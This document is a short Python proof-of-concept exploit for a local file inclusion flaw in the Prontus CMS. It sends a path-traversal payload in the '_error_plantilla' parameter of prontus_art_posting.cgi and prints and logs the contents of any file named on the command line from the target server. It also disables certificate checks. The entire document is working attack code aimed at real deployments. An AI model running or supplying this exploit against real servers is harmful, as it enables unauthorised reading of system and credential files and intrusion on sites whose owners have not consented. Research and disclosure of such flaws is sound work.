#!/usr/bin/python3 # isra import re import ssl import argparse import requests from urllib import request, parse ctx = ssl.create_default_context() ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE def check_lfi(host, file, prontus_id, idf, ssl): """ """ print("[+] Starting...") with open("{}.log".format(host), "a+") as log_file: log_file.write("\nChecking host {}\n".format(host)) if(ssl): host = "https://{}".format(host) else: host = "http://{}".format(host) url_cgi = "{}/cgi-bin/prontus_art_posting.cgi".format(host) data1 = {"_NP": prontus_id, "_IDF": idf} data2 = {"_NP": prontus_id, "_IDF": idf, "_error_plantilla": "../../../../../../../../../../{}".format(file)} # check prontus id & form id print("[+] Checking Prontus ID and Form ID params.") req = requests.post(url_cgi, data1, verify=False) if "Error en los datos enviados" in str(req.text): print("[-] Prontus ID or Form ID not valid. Exiting...\n") return # do it print("[+] Sending payload & parsing content...\n") req = requests.post(url_cgi, data2, verify=False) print("Got reply from {}:\n".format(host)) print("{}\n".format(req.text)) log_file.write("Got reply from {}:\n".format(host)) log_file.write("{}\n".format(req.text)) def main(): parser = argparse.ArgumentParser() parser.add_argument("host", help="Target host") parser.add_argument("file", help="Local file to include") parser.add_argument("--prontus", default="nivel4", help="Target Prontus ID") parser.add_argument("--form", default="postingform", help="Target form ID") parser.add_argument("--ssl", help="Enable SSL", action="store_true") args = parser.parse_args() print("#"*80) print("\n***** Prontus CMS LFI PoC *****") print("[+] Host: {}".format(args.host)) print("[+] File: {}".format(args.file)) print("[+] Prontus ID: {}".format(args.prontus)) print("[+] Form ID: {}".format(args.form)) print("[+] SSL: {}".format(args.ssl)) check_lfi(args.host, args.file, args.prontus, args.form, args.ssl) if __name__ == "__main__": main()